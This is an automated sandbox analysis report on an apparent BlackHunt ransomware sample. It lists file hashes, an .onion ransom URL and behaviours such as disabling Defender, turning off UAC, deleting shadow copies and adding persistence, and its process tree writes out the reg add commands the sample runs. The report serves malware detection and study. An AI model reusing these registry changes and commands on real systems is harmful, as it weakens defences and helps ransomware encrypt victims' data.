Analysis
-
max time kernel
153s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 00:55
Static task
static1
Behavioral task
behavioral1
Sample
cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe
Resource
win10v2004-20231215-en
General
-
Target
cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe
-
Size
707KB
-
MD5
c08ed3f2a66373116775d9d0bdc5f89f
-
SHA1
f4a6d69dac3b9ad057d58c99aecde9144b06df43
-
SHA256
cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a
-
SHA512
7c3ddda04cddb04ca5a8547c1e4ef25e3e6849a137b0277521c86f1603bf6ddd1e93a67aa8c5a914b36da35b6f228d3f24267fa377b9b838fb0a8b9fcb7de150
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1K8Evnh:6uaTmkZJ+naie5OTamgEoKxLWx6h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5988 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5380 bcdedit.exe 6004 bcdedit.exe -
Renames multiple (640) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5388 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\J: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\K: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\U: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\P: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\A: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\G: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\Z: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\M: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\T: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\I: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\H: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\L: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\E: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\V: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\Y: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\O: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\X: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\B: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\R: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\S: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\dynalink.md cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jre-1.8\legal\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\jmxremote.password.template cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_zh_TW.properties cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\webkit.md cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\management\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\ant-javafx.jar cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngom.md cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\limited\US_export_policy.jar cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Reference Assemblies\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\nashorn.jar cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaTypewriterRegular.ttf cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\[email protected] cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk-1.8\bin\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\ExpandDebug.raw cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\co\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\MSBuild\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4916 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4320 vssadmin.exe 5220 vssadmin.exe 3568 vssadmin.exe 1048 vssadmin.exe 2756 vssadmin.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeRestorePrivilege 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeBackupPrivilege 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeTakeOwnershipPrivilege 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeAuditPrivilege 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeSecurityPrivilege 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeIncBasePriorityPrivilege 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeBackupPrivilege 2952 vssvc.exe Token: SeRestorePrivilege 2952 vssvc.exe Token: SeAuditPrivilege 2952 vssvc.exe Token: SeBackupPrivilege 6832 wbengine.exe Token: SeRestorePrivilege 6832 wbengine.exe Token: SeSecurityPrivilege 6832 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4064 wrote to memory of 4484 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 91 PID 4064 wrote to memory of 4484 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 91 PID 4064 wrote to memory of 4712 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 93 PID 4064 wrote to memory of 4712 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 93 PID 4064 wrote to memory of 4932 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 94 PID 4064 wrote to memory of 4932 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 94 PID 4064 wrote to memory of 1764 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 97 PID 4064 wrote to memory of 1764 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 97 PID 4064 wrote to memory of 1976 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 99 PID 4064 wrote to memory of 1976 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 99 PID 1976 wrote to memory of 4996 1976 cmd.exe 104 PID 1976 wrote to memory of 4996 1976 cmd.exe 104 PID 1764 wrote to memory of 4100 1764 cmd.exe 107 PID 1764 wrote to memory of 4100 1764 cmd.exe 107 PID 4932 wrote to memory of 3540 4932 cmd.exe 103 PID 4932 wrote to memory of 3540 4932 cmd.exe 103 PID 4712 wrote to memory of 2780 4712 cmd.exe 106 PID 4712 wrote to memory of 2780 4712 cmd.exe 106 PID 4484 wrote to memory of 1600 4484 cmd.exe 105 PID 4484 wrote to memory of 1600 4484 cmd.exe 105 PID 4064 wrote to memory of 4672 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 108 PID 4064 wrote to memory of 4672 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 108 PID 4064 wrote to memory of 3912 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 110 PID 4064 wrote to memory of 3912 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 110 PID 4064 wrote to memory of 3868 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 112 PID 4064 wrote to memory of 3868 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 112 PID 4672 wrote to memory of 636 4672 cmd.exe 114 PID 4672 wrote to memory of 636 4672 cmd.exe 114 PID 4064 wrote to memory of 548 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 115 PID 4064 wrote to memory of 548 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 115 PID 4064 wrote to memory of 2872 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 117 PID 4064 wrote to memory of 2872 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 117 PID 4064 wrote to memory of 1252 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 118 PID 4064 wrote to memory of 1252 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 118 PID 3912 wrote to memory of 4388 3912 cmd.exe 120 PID 3912 wrote to memory of 4388 3912 cmd.exe 120 PID 4064 wrote to memory of 2380 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 122 PID 4064 wrote to memory of 2380 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 122 PID 3868 wrote to memory of 2044 3868 cmd.exe 124 PID 3868 wrote to memory of 2044 3868 cmd.exe 124 PID 4064 wrote to memory of 4164 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 125 PID 4064 wrote to memory of 4164 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 125 PID 2872 wrote to memory of 2972 2872 cmd.exe 127 PID 2872 wrote to memory of 2972 2872 cmd.exe 127 PID 4064 wrote to memory of 4520 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 128 PID 4064 wrote to memory of 4520 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 128 PID 4064 wrote to memory of 4336 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 129 PID 4064 wrote to memory of 4336 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 129 PID 4064 wrote to memory of 4308 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 130 PID 4064 wrote to memory of 4308 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 130 PID 4064 wrote to memory of 696 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 132 PID 4064 wrote to memory of 696 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 132 PID 4064 wrote to memory of 1268 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 134 PID 4064 wrote to memory of 1268 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 134 PID 4064 wrote to memory of 3056 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 139 PID 4064 wrote to memory of 3056 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 139 PID 1252 wrote to memory of 3524 1252 cmd.exe 138 PID 1252 wrote to memory of 3524 1252 cmd.exe 138 PID 4064 wrote to memory of 1668 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 137 PID 4064 wrote to memory of 1668 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 137 PID 548 wrote to memory of 1068 548 cmd.exe 136 PID 548 wrote to memory of 1068 548 cmd.exe 136 PID 4064 wrote to memory of 3856 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 144 PID 4064 wrote to memory of 3856 4064 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 144 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe"C:\Users\Admin\AppData\Local\Temp\cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4064 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4100
-
-
-
